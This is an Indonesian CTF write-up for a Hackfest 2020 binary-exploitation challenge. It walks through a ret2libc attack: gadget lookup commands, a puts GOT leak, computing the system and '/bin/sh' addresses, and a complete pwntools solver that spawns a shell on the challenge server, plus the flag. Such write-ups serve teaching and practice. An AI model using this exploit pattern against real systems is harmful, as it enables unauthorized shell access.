# libc

    return to libc 

# Solusi
untuk melakukan return to libc kita memerlukan beberapa alamat memory, diantaranya:

* ret
* pop rdi
* puts@GLIBC_2.2.5
* puts@plt
* main

untuk mendapatkan alamat ret kita dapat menggunakan perintah

    ropper --file lib --search="ret"

untuk mendapatkan alamat `pop rdi` kita dapat menggunakan perintah 

    ropper --file lib --search="pop rdi"

lalu untuk mendapatkan puts@GLIBC_2.2.5 kita dapat menggunakan perintah

    readelf -r lib

dan untuk puts@plt kita dapat menggunakan perintah

    objdump -d -M intel lib| grep puts 

terakhir untuk main kita dapat menggunakan perintah

    objdump -d -M intel lib| grep main

sebelumnya kita hitung dahulu, offset untuk melakukan overwrite register `%rip`, disini 
saya menemukan offsetny adalah `264`, lalu rancang payload untuk melakukan leak terhadap
libc function lalu balik kembali ke main, seperti berikut:

    p = "A" * 264
    p += p64(pop_rdi)
    p += p64(puts_got)
    p += p64(puts_plt)
    p += p64(main)

code diatas akan mengoverwrite nilai `%rip` menjadi `pop %rdi` dan memasukan alamat function got
puts kedalam register `%rdi` lalu melakukan print terhadap function libc puts, setelah terprint
program akan kembali ke main. selanjutnya hitung address puts untuk mendapatkan alamat system dan
string `/bin/sh` dengan menggunakan rumus:

    base = leak - libc.sym['puts']
    system = base + libc.sym['system']
    binsh = base + libc.search("/bin/sh").next()

selanjutnya kita overflow lagi untuk jump mendapatkan shell, namun kali ini kita harus menggunakan
gadget `ret` agar exploit kita bekerja, berikut full solver:

    #!/usr/bin/env python2
    import sys
    from pwn import *
    context.update(arch="amd64", endian="little", os="linux", log_level="info",
                terminal=["tmux", "split-window", "-v", "-p 85"],)
    LOCAL, REMOTE = False, False
    TARGET=os.path.realpath("/home/tripoloski/code/ctf/hackfest-2020/quals/pwn/libc/source/lib")
    elf = ELF(TARGET)
    libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
    def attach(r):
        if LOCAL:
            bkps = []
            gdb.attach(r, '\n'.join(["break %s"%(x,) for x in bkps]))
        return

    def exploit(r):
        # attach(r)
        pop_rdi = 0x0000000000401293
        puts_plt = 0x000000000401070
        puts_got = 0x000000404018
        main = 0x00000000004011dd
        ret = 0x000000000040101a
        p = "A" * 264
        p += p64(pop_rdi)
        p += p64(puts_got)
        p += p64(puts_plt)
        p += p64(main)
        r.sendlineafter(">>> ",p)
        leak = u64(r.recvline().replace("\x0a","").ljust(8,"\x00"))
        base = leak - libc.sym['puts']
        system = base + libc.sym['system']
        binsh = base + libc.search("/bin/sh").next()
        info("leak : " + hex(leak))
        p = "A" * 264
        p += p64(ret)
        p += p64(pop_rdi)
        p += p64(binsh)
        p += p64(system)
        p += p64(main)
        r.sendline(p)
        r.interactive()
        return

    if __name__ == "__main__":
        if len(sys.argv)==2 and sys.argv[1]=="remote":
            REMOTE = True
            r = remote("ccug.my.id", 10095)
        else:
            LOCAL = True
            r = process([TARGET,])
        exploit(r)
        sys.exit(0)

FLAG: hackfest{ini namanya ret2libc gengs !!!9074018389290147}